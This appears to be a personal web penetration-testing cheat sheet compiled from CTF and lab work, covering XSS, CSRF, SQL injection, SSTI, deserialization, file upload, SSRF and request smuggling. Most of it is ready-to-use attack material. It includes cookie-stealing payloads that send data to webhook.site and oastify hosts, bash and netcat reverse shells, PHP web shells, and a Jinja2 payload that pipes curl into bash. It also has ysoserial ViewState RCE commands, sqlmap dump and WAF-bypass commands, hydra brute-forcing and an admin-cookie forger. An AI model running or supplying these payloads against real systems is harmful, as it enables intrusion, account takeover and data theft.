# Web Penetration
**Basic Information**
Check List:
https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
[Portswiger WebSecurity-WriteUP](/6XUFmwPkRAeVHV39XUS6oA)
**Useful Browser extensions**
- Wappalyzer
- X-Forwarded-For
- Edit Cookie
- DotGit (.git leak) Check | git-dumper (download code)
Public Server to testing out band request !
https://webhook.site
# WAF Bypass
## Fuzzing Filtered char
Wordlist:
/usr/share/seclists/Fuzzing/special-chars.txt
```
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -t 1
```
Match Forbidden Response
```
ffuf -request-proto http -request req1 -w /usr/share/seclists/Fuzzing/special-chars.txt -mc 403
```
![圖片](https://hackmd.io/_uploads/r1E_l8w7R.png)
## Limite Request
https://github.com/assetnote/nowafpls?tab=readme-ov-file#documented-waf-limitations
## No spaces
```
%20
%09
%0D
%0C
%0B
%0A
%A0
```
```
ls${IFS}-la
echo${IFS}meowkkkkkkkkkkk
cat${IFS}/*fla*
```
## Emoji obfuscation
https://book.hacktricks.xyz/pentesting-web/unicode-injection#emoji-injection
https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209
💋 -> d"Y'<
💛 -> d"Y'>
//-> remote d"Y' as JS
```
💋img src=x onerror=alert(document.domain)//💛
```
![圖片](https://hackmd.io/_uploads/SkluKKY40.png)
```
💋img/src=x onerror=alert(document.domain)//💛
💋svg/onload=alert`document.domain`//💛
💋iframe/src=javascript:alert`1`//💛
```
## SQLI injection
### Base64
https://www.ifreesite.com/unicode-ascii-ansi.htm
Vuln: PHP / Json Decode
```
' -> \u27
' -> \u027
' -> \u0027
```
## XSS
### Between Tags
#### HTML
```htmlembedded=
<svg/onload=alert(/xss/)>
<img src="not_exist" onerror="alert(1)">
<img/src/onerror=alert(1)>
<svg onload=prompt()></svg>
<svg onload="alert(1)"></svg>
<link rel=attachment href="http://attacker.com">
```
**Multiple Zero**
```html
<svg onload=prompt()>
<svg onload="alert(1)"></svg>
```
#### Unicode
```html
<svg onload=prompt()></svg>
<svg onload=\u0070\u0072\u006f\u006d\u0070\u0074()></svg>
```
Work
### IN URL
atob() -> base64 Decode function
```
atob`ZG9jdW1lbnQud3JpdGUoIjxoMT5UaGlzIGlzIHRlc3Q8L2gxPiIp`
```
```
Payload:
<img src=1 onerror=alert("Hello")>
Base64 encoded:
'PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg=='
URL:
?redirect=javascript:atob`PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==`
```
# XSS
Leverage: User trust website (NO Vulnerable !)
- url parameter
- url filepath
- post data
- HTTP headers
Note: if the browser encoding the input before process the data, the XSS attack may didn't work!!
## xsstrike (Auto)
**Useful options**
`--proxy` -> default 0.0.0.0 8080
```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```
`--crawl`
```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/ --crawl --level 4
```
### Single Endpoint
GET
```
python xsstrike.py -u https://0ab8002a03f5ad1f818c0747004200d7.web-security-academy.net/?search=123 --proxy
```
Post
```
python xsstrike.py -u "0a110090043fe54f816f7650004e00c4.web-security-academy.net/product?productId=1" --data "q=query"
```
DOM -> u -> Vuln Code !(js)
![image](https://hackmd.io/_uploads/H10dsJPNC.png)
### Testing Blind XSS
Config /core/config.py
![圖片](https://hackmd.io/_uploads/ByLMOLrUC.png)
--blind inject blind XSS payload while crawling
```
#GET (Work) Post Note Work -> Manual !
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
```
### History
```
python xsstrike.py --seeds urls.txt
python xsstrike.py -u "http://example.com" -t 10 --crawl --levl 3
```
## HTML Attributes
```html
#Tags Close
"><script>alert(document.domain)</script> #search bar! (most !)
"><iMg src=meow onerror=alert`meow`>
```
```
#Attribute Close
padding' autofocus onfocus=alert(document.domain) x='padding
padding" autofocus onfocus=alert(document.domain) x="padding
padding" autofocus onfocus=prompt`document.domain` x="padding
"123%0aaUtofocUS%0aONFOcUS=prompt('testing')``
## Option Tags
padding" onclick=alert(1) x="padding
#Link Tags Exploit
'accesskey='x'onclick='alert(1)
?'accesskey='x'onclick='alert(1)
User Triiger Exploit
ALT+SHIFT+X
CTRL+ALT+X
Alt+X
```
IF src attribute is controllable!
```
javascript:promt(/xss/)
javascript:window.location=//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174
```
## Between the Tag
### Testing html tags ! (some tags not work !)
```
<b>meowhecker</b>
<s>meowhecker</s>
<hTML%0DoNPOInTeREnTEr%0D=%0Da=prompt,a()%0Dx>
<DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
</tiTLe><HtMl%09OnmoUseoVer%0d=%0d["nics113pt36507"].find(confirm)//
<iframe src=javascript:document.cookie;alert(1)></iframe>
<iframe src="<?php echo htmlspecialchars($_GET['src']) ?>">
#https://vul.com?src=javascript:alert(1)
window.location = 'javascript:alert(1)'
<a href=javascript:alert(1)>click Me</a>
```
### Closs Tags (/select,/options)
select,options
```
</option></select><DEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx>3nd
```
### Load Remote HTML or Script (Blind XSS)
```htmlembedded=
#Identify
<img src=//webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e?XsS onerror=prompt();>
<meta http-equiv="refresh" content="0; url=https://webhook.site/8ebdbec3-2440-4902-a029-09b70c44adaf/index.html">
<script src=http://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e/csrf.js></script>
<img src="meowhecker" onerror="document.write('<script src="https://webhook.site/83ce596e-c4f8-4bc9-906c-fd54441fb64e"></script>')"/>
```
## XSS in Javascipt context
### Break js String
Close Script tags (<,> work)
```
#Firefox, Chrome
</script><img/src=1 onerror=alert`document.domain`>
#Chrome
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
<DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt(document.domain),a()//
```
if (' or " work), '<' be filtered!
```
'-alert(1)-'
';alert(document.domain)//
'-document.write("<s>Meowhecker</s>")-'
#bypass (not allow ')
'-alert(1)-'
'-alert(1)-'
'-document.write("<s>Meowhecker</s>")-'
```
### Javascript template XSS
vuln code
```
var name = `source can control` //jvascript template
```
exploit
```
${alert(document.domain)}
```
### Steal Cookie
```
javascript:window.location="//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174?a="+btoa(document.cookie)
<iframe src=javascript:window.location="//p7xye7qy9fvyogvam896eah4hvnmbcz1.oastify.com?a="+btoa(document.cookie)></iframe>
<svg onload=document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+btoa(document.cookie)></svg>
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
<img src=//p5vt8fwjrjs5w7b0c8bcmkivhmndb3zs.oastify.com?image onerror=fetch(`//webhook.site/bcbed4e2-db5a-454d-a7eb-e7ba14ced174/?A=${encodeURIComponent(document.cookie)}`);>
```
```
var link = document.createElement('meta');
link.httpEquiv = 'refresh';
link.httpEquiv = '1; //mwoehcker.com?a='+document.cookie;
document.getElementsByTagName('head')[0].appendChild(link);
```
not Varify
## IN url -> HTTP Protocol
```html
javascript:\u0061lert`1`
javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074`1`
```
# XSRF
leverage: Server trust user behavior
## Exploit -CSRF Change password
Basic (work)
```html
<html>
<body>
<form action="http://login.worldwap.thm/change_password.php" method="POST">
<input type="hidden" name="new_password" value="meowmeow" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
URL bypass (Work)
```html
<html>
<body>
<form id="myForm" method="POST">
<input type="hidden" name="new_password" value="meowmeow" />
</form>
<script>
var form = document.getElementById("myForm");
var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw");
form.setAttribute("action", actionUrl);
form.submit();
</script>
</body>
</html>
```
## Favicon (Detect Framework)
https://wiki.owasp.org/index.php/OWASP_favicon_database
```
wget <favicon> | md5sum
```
# CMS Scanner
## CMS Scanner (General)
https://github.com/Tuhinshubhra/CMSeeK
## wpscan
Wordpress Scanner
*Enumerate*
```
wpscan --url internal.thm/wordpress/
```
**Exploit** (Authentication Bypass)
Work 5.4.2
```
wpscan --url $TARGET_DOMAIN/wordpress//wordpress/ --passwords rockyou.txt --usernames admin --max-threads 50
```
https://github.com/wpscanteam/wpscan
## joomscan Scanner
https://github.com/OWASP/joomscan
# Authentication Bypass
## List of Login bypass
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
## Brute-Force Attack
[Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw)
Base Response Time (UserName Enumerate)
- Set long password (50~100 char)
### Defense Mechanism
- IP block
- Account Limit
- Rate limit
### Bypass
#### IP-Block
```
X-Forwarded-For:x
```
- Reset Mechanism !
https://raw.githubusercontent.com/Meowheckerrr/WebSecurity/main/ToolsDev/AddingValidStringToWordlist/addingValidBypassIpBlock.py
#### Account limit
Way1 - Spray password
Step1
Enumerate -> User list (response)
Step2
Decide a very small shortlist of passwords, it have to small then attempt limit.
Way2 - Credential stuffing attacks
### User Name Enumerate
- Forget Password
- Login Page
- Lock Account Mechanism ! -> Error Message
### Password Brute Force
#### Post-Form Brute Force
```bash
WEB_URL='/wp-login.php'
PARAMETERS='log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.125.64%2Fwp-admin%2F&testcookie=1'
hydra -l 'elliot' -P rockyou.txt $TARGET_IP http-post-form "$WEB_URL:$PARAMETERS:The password you entered for the username" -vV -t 10
```
#### HTTP Basic Authentication
Login Methods
```
http://username:password@HOST_DOMAIN_ADN_IP
```
![圖片](https://hackmd.io/_uploads/SktY3Mcx0.png)
```
Authorization: Basic base64('username:password')
```
![圖片](https://hackmd.io/_uploads/ByBc3f9lA.png)
```
hydra -l 'admin' -P rockyou.txt -s 80 $TARGET_IP http-get $WEB_URL -v
```
# HTTP Header Bypass
## Rewrite Ip Source & Rewrite Request path
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/special-http-headers#headers-to-change-location
Request Forwarding Header
```
X-Original-URL
X-Rewrite-URL
```
# Access Control
## Method Bypass
Original Request
```
POST /admin-roles
username=carlos&action=upgrade
```
Exploit
```
POSTA /admin-roles?username=wiener&action=upgrade
```
Work
Flawed Check
- Unprotected URL
- Parameter-Base Flaws
- URL-Base Access Control (Proxy) & HTTP Header Bypass
- Proxy and Framework URL-Matching Discrepancies
- Method-Bases - Flaws
# LDAP Injection
https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-a58ea2462cf2b98a868750b068a00fa32ccb807b%2FEN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf?alt=media
![圖片](https://hackmd.io/_uploads/SyAOZnpG0.png)
## Auth Bypass
normal filter query
```
(&(USER=admin)(PASSWORD=pass))
```
Bypass
```
admin)(&))
```
## Information disclosure
Normal Filter query
```
(|(type=Object1)(type=Object2)
```
malicious (inject -> Object1)
```
computer)(uid=*)
```
# Command Injection
## paylod
![圖片](https://hackmd.io/_uploads/HkRXkriQ0.png)
```
`sleep 5`
```
## Bash Shell
![圖片](https://hackmd.io/_uploads/HJQTg-de0.png)
(Default Cmd) + (Inject point)
```bash
() { :; }; sleep 10
or
() { :; }; ping 127.0.0.1 -c 10
or
() { :; }; curl http://ik63y1ea94vws1xaeeo2ujwspjvaj87x.oastify.com
```
## CLI no space
## RevShell
linux
```
echo "bash -i >& /dev/tcp/10.10.14.12/443 0>&1" > revshell
python3 -m http.server 80
```
```
curl http://10.10.14.12/revshell -o /tmp/revshell
bash /tmp/revshell
```
# NoSQL injection
Table -> collection
Records -> document
Normal Query
```
db.handgun.find({"owner":"meowhecker"})
```
# SQL Injection
## Filter Bypass
XML Obfuscation
```
1 UNION SELECT null-- -
1 UNION SELECT null-- -
```
Work
## Manual Exploit
**Show Tables**
```
union select table_name from information_schema.tables-- -
```
Work
**Show Columns (specify tables)**
```
union select column_name from information_schema.columns where table_name='users'-- -
```
**Retrieve Data **
```
union select username || '~' || password from users
UNION SELECT CONCAT(email, '|', password, '|', username) AS meow FROM users
```
Work
## SQLIMAP
https://github.com/sqlmapproject/sqlmap
https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/
waf-bypass (reference)
https://www.vaadata.com/blog/exploiting-an-sql-injection-with-waf-bypass/
Default Agent: ->
```
sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
```
### Useful Options
**--random-agent**
**--tamper**
Encoding payload
Scripts
https://muhdaffa.medium.com/tips-and-tricks-for-effective-sql-injection-testing-using-sqlmap-tamper-scripts-ed4bfa5717e7
F5 bypass
e.g. unicode Bypass
```
sqlmap -r req --tamper=charunicodeescape -p user -t 10 --dbs
```
**--delay**
Prevent be filtered by Limit Rate (WAF)
Impotant
```
-- delay 1
-- delay 3 (stable)
-- delay 5 (stable)
```
**--proxy**
we can specify the traffic through the burp proxy
**--level 5 --risk 3**
Best-effort try paylod
**--batch**
Default answer to any prompt
**--dbs**
fetch Database Name
**--dump-all**
Dump all
**--exclude-sysdbs**
Avoid the extraction of system databases.
**--ignore-timeouts**
ignore timeout connection !
**--threads**
### BASIC Usage:
```
# NO Waf Case
sqlmap -r req --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 -p d
sqlmap -r req --random-agent --dbs --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --threads=10
#Waf Case
sqlmap -r req --random-agent --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080
sqlmap -r req --tamper=charunicodeescape --delay 1 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all
sqlmap -r req --random-agent --tamper=charunicodeescape -p user --dbs --dbms=mysql --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --delay 3
sqlmap -r req1 --random-agent --tamper=charunicodeescape --delay 3 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dbs --exclude-sysdbs --dump-all
```
sqlmap -r req1.txt --risk=3 --level=5 --random-agent --dbs -p username
More Example
```
sqlmap -u "http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```
Vulnerable Website -> http://10.10.249.47/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
Risk -> Deep
level -> Complex
Random-agent -> Enumerate Different User
dbs -> Auto enumerate the type of database
p -> Parameter (Vulnerable parameter )
### Exploitation
Task -> Find Admin credential
Listing information
-D -> DataBase
-T -> Table
Show tables
```
sqlmap -r apiTest.txt -D vn_admin --tables
```
Show columns
```
sqlmap -r apiTest.txt -D vn_admin -T fe_users --columns
```
Dump data
```
sqlmap -r apiTest.txt -D vn_admin -T fe_users -C password --dump
```
# Customize Temper
Example
```python=
#!/usr/bin/env python
def dependencies():
pass
def tamper(payload:str, **kwargs):
CrucialString=[
'DATABASE()','FROM','schema_name','INFORMATION_SCHEMA.SCHEMATA','table_name',
'INFORMATION_SCHEMA.TABLES','table_schema','column_name','INFORMATION_SCHEMA.COLUMNS'
]
if payload:
if 'UNION' in payload:
payload=payload.replace('UNION','/*!--%20-%0AuNiOn%23a%0A*/')
if payload.startswith('42 '):
payload=payload.replace('42 ','42 and 0 ')
for i in CrucialString:
if i in payload:
payload=payload.replace(i,f'/*!50000{i}%23a%0A*/')
if '-- ' in payload:
payload=payload.replace('-- ','--%20')
return payload.replace(' ','/**/')
```
# Deserialize
## ASP.NET
### Exploit __VIEWSTATE Parameter
Ref: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
This parameter is used to management page and control data cross the web page, During the rendering of a page HTML.
#### Case:1
EnableViewStateMac = True/False (?)
ViewStateEncryptionMode = True
web.confing (FUZZing)
```
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```
Generate Payload
notice -> Path
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```
Work (not quote)
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
Listener - Interface
sudo tcpdump -ni tun0 icmp
# SSTI
Reference:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Fuzzing - Engine Identify
```
${{<%[%'"}}%\
<%=meowhecker%>
{{6*9}}
${6*9}
-> Error Meaage
{{7/0}}
${7/0}
```
## Plaintext context (Injected Expression)
ERB (Template Engine)
```
<%= system("whoami") %>
```
Handlebars:https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs (Blind RCE-Work )
## Code context (Close Expression)
Tornado (Template Engine)
```
"A" }} {{Exploit-Methods or Objects}} {{"B"
"meowHead" }} {% import os %} {{os.system('whoami')}} {{"meowTail"
```
## RCE
Python - Jinja2 (Filter Bypass )
https://starlox.medium.com/hackthebox-iclean-writeup-cfc46f351353
```
bash -i >& /dev/tcp/10.10.14.79/443 0>&1
```
```
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}}
```
# API Testing
## Bearer Token Auth Bypass CSRF require
Bearer Token 认证:客户端明确在请求中设置 Authorization 标头,包含 Bearer Token。因为浏览器不会自动附加这些标头,攻击者无法利用用户的身份发送未经授权的请求。
Bearer Token 是一种安全的认证方式,可以有效避免 CSRF 攻击
Delete Cookie -> Using Bearer Token to verify !
```
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: teamcity.runner.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.VHNYZVRNS0t3UWlkeXVEeklQSUFUVDJWTk1j.YjhjYTIyZTEtNTQwNi00ZjQ5LWJmOTEtNjkyODkwNTUxYTQx
Connection: close
```
# Fuzzing
Tools List
-> ffuf
-> BurpSuite Professional
Document-> ffuf Fuzzing multiple location
https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#fuzzing-multiple-locations
(Wait to read)
## Hide Parameters
When we found the sensitive php .asp Program page, page return -> blank or Parameter Missing
### Arjun (Tools - Recommend !)
```
arjun -u http://internal.analysis.htb/users/list.php
```
## Valid Extensions
```
ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt
```
# Path Traversal
```
http://meowhecker.com/index.php?file="filePath"
```
Fuzzing
**Linux**
```
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
```
**Windows**
Fuzzing List !
wget https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/dirTraversal-win.txt
wget https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt
(Found - 1)
-win.ini
```
ffuf -request-proto https -request req -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
-fs 15
ffuf -request-proto http -request req -w ./dirTraversal-win.txt -fs 15
```
## Exploit
- Windows
https://gist.github.com/SleepyLctl/823c4d29f834a71ba995238e80eb15f9
- hMailServer (UserName,password)
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
# File Upload
Extension wordlist
/usr/share/wordlists/dirb/extensions_common.txt
Check What kind of filter on upload page
## Bypass
### content type Check
![image](https://hackmd.io/_uploads/Hy6hfaWyC.png)
Bypass content-Type check !
```
Content-Disposition: form-data; name="file"; filename="shell.jpg.php"
Content-Type: image/jpeg
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.17.1.166 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```
### Extension check
Multi extension
```
shell.jpg.php
shell.php.jpg
```
Next step
(Verify !)
```
shell.php%0a%0d.jpg
shell.php%0d%0a.jpg
shell.php .jpg
shell.php%00.jpg
shell.php/x00.jpg
```
(If work)
Exploit
```
cp shell.php%0a%0d.jpg shell.php (Service will upload shell.php)
```
## Magic String (Code Injection)
Way1:
PoC
```
exiftool -Comment="<?php echo 'START ' . phpinfo() . ' END'; ?>" ./Cat03.jpg -o JPGwithPHPinfo.php
```
![圖片](https://hackmd.io/_uploads/rJQuybwm0.png)
## HTTP verb (PUT)
```
PUT /images/exploit.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49
<?php echo phpinfo(); ?>
```
## Exploit - Read Sensitive File (shtm,shtml - SSI)
Payload
read.shtml
```
<!--#include file="web.config" -->
<!--#include file="/web.config" -->
```
Real content in Source code
### Exploit WebShell RCE
### PHP
PoC
```
<?php phpinfo(); ?>
```
web_sehll
```
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
```
```
<?php echo "<pre>" . shell_exec("mkfifo /tmp/f; nc 10.4.42.63 80 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f") . "</pre>"; ?>
```
Windows XAMPP - Work
# Cookie Crack
## ASP.NET (web.config)
Check HTTP Runtime Tags
![圖片](https://hackmd.io/_uploads/Hyi8yrz70.png)
if computer didn't have specify version, we need to install the pack form microsoft
Version: 4.6.1
https://www.microsoft.com/en-us/download/details.aspx?id=49978
![圖片](https://hackmd.io/_uploads/rkQiTDmXC.png)
Decryption Code
https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsDecrypt.cs
Adding Reference - System.Web
![圖片](https://hackmd.io/_uploads/ryMfzK77A.png)
Adding Machinekey to App.config(From repo)
https://github.com/liquidsec/aspnetCryptTools/blob/main/app.config
```xml=
<?xml version="1.0"?>
<configuration>
<system.web>
<compilation debug="false" targetFramework="4.0" />
<machineKey validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" validation="SHA1" decryption="AES" />
</system.web>
</configuration>
```
![圖片](https://hackmd.io/_uploads/ryVU7FNQA.png)
Cracking .ASPXAUTH value
![圖片](https://hackmd.io/_uploads/rkTmPKNXC.png)
![圖片](https://hackmd.io/_uploads/rkhcwtNXA.png)
Modify user account -> Admin email
```
1
nicstesting01@gmail.com 2024/5/17 下午 03:22:29
2024/5/17 下午 03:52:29
True
test
/
```
Analysis cookie Parameter
https://learn.microsoft.com/en-us/dotnet/api/system.web.security.formsauthenticationticket.-ctor?redirectedfrom=MSDN&view=netframework-4.8#system-web-security-formsauthenticationticket-ctor(system-int32-system-string-system-datetime-system-datetime-system-boolean-system-string)
version
name
issueDate
expiration
isPersistent
userData
## Generate Admin Cookie
Source Code
https://github.com/liquidsec/aspnetCryptTools/blob/main/FormsEncrypt.cs
![圖片](https://hackmd.io/_uploads/HyesjFEQ0.png)
```c sharp
using System;
using System.Web.Security;
namespace FormsEncryptor
{
class Program
{
static void Main(string[] args)
{
// Take an existing forms cookie
string encryptedTicket = "8A9A1063BAE0F9E7E881A908E4DEA1C4F2BC2DE8995DB401651CD6F653289C1BF05371D2FE6A5E412AE7C4F4BBEA9B630335576CA4E65DCA42CDBC8207A125E0CCD9CD6CDA0E6468D060DCB409F981F04CEEBAE7CB617E74DD3E3849CE3DA02A9C7201667D7DCF8956724E2572148192CD1F446ED28BC4601C24463280E6A20BF2530D31A67CD627172E504CC77F12374D7E8DDF ";
string adminUsername = "admin@perspective.htb";
FormsAuthenticationTicket unencryptedTicket = FormsAuthentication.Decrypt(encryptedTicket);
FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
1,
adminUsername, //comment out if you want to change the username
DateTime.Now,
DateTime.Now.AddMinutes(1200000), // Add 120 minutes to expiry
unencryptedTicket.IsPersistent,
unencryptedTicket.UserData,
"/"
);
string encTicket = FormsAuthentication.Encrypt(ticket);
Console.WriteLine(encTicket);
Console.Read();
}
}
}
```
Admin Cookie
![Uploading file..._p4nje7v8x]()
![圖片](https://hackmd.io/_uploads/ryaQycN70.png)
# SSRF
Hide Attacker Surface
- Host Name,Request Path
- External Entry (Exploit XXE to SSRF)
- Reference Header
Danger Function
PHP
```php=
file_get_contents
curl_exec()
fopen(),fread(),fclose()
```
Python
```python
requests.get() , reqeusts.post()
urllib.request.urlopen()
```
ASP
```c#
ServerXMLHTTP
Server.CreateObject("Msxml2.ServerXMLHTTP")
```
## Bypass (blacklist)
## Tags Filter
```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000">
```
It will return the response via xml (we have to use source code to look at)
## Alternate 127.0.0.1
```
2130706433
017700000001
127.1
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
127.0.0.1.nip.io
spoofed.burpcollaborator.net
```
or
Case
Work-!!
IP to Integers Bypass block list
https://www.browserling.com/tools/ip-to-dec
### Bypass filter via Open redirect
- open redirect page
- API (launch request from the we application )
![圖片](https://hackmd.io/_uploads/rJAaoeP70.png)
```
POT /stock (SSRF)
api=/Open/Redirect/Page?path=http://127.0.0.1:8080
/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin/delete?username=carlos (Work!)
```
### Bypass White list
Notice: Hash tags are double encoded to avoid be replace as null string
```
http://127.0.0.1#meow:meow@stock.weliketoshop.net
http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net
```
Work
# CMS penal TO RCE
## Typo3 Admin penal to RCE
![image](https://hackmd.io/_uploads/ByqePz-kC.png)
![image](https://hackmd.io/_uploads/ByCbwG-JA.png)
![image](https://hackmd.io/_uploads/BJ2fwfbJA.png)
![image](https://hackmd.io/_uploads/SyIzPGbkC.png)
![image](https://hackmd.io/_uploads/Sy3mwzZ1A.png)
![image](https://hackmd.io/_uploads/rJaEvf-y0.png)
## Word Press Penal RCE
Trigger web shell
```
http://$TARGET_IP/wp-content/themes/twentytwelve/404.php
```
## HTTP Header
### Ip-Protection Bypass (IF website have proxy)
X-Forwarded-For
```
curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000
```
# HTTP smuggling Request
Exploit -> HTTP/1.1 (Work!) - Setting
```
Content-Length:
Transfer-Encoding: chunked
```
Sove invalid Post request
```
Content-Type: application/x-www-form-urlencoded
```
## CL-TE Vulnerability Identity
Work
```
POST / HTTP/1.1
Host: 0a3300c1033290bc81a2c6af00dd00df.web-security-academy.net
Content-Length: 15
Transfer-Encoding: chunked
0
meowhecker
```
Send Twice -> IF web site receive "MEOWHEKCERPOST" Vulnerability Detected !!!
Time-base Detection (Work)
```
POST / HTTP/1.1
Host: 0a35008c04210c4984e9b02d00310030.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 4
1
F
TEnotZeroToEnd
```
## TE-CT Vulnerability Identity
Work
```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 2
4c
POST /meowheckerAdminPennel HTTP/1.1
Content-Length: 200
meow=meowhecker
0
```
![圖片](https://hackmd.io/_uploads/BySfbr8MR.png)
Time Base-Detection
Work
```
POST / HTTP/1.1
Host: 0a9600b503329d258047eebb001c002d.web-security-academy.net
Transfer-Encoding: chunked
Content-Length: 7
0
10
```
---
![圖片](https://hackmd.io/_uploads/B154fkwfC.png)
# HTML t0 PDF RCE : Reportlab
eval() (Code Injection)
Inject Point
html color Attribute value passing attribute Value to eval Funtion!
Defance Functions
![image](https://hackmd.io/_uploads/HyvZXQEEC.png)
# PHP HaSH
https://www.cnblogs.com/haidragon/p/16845563.html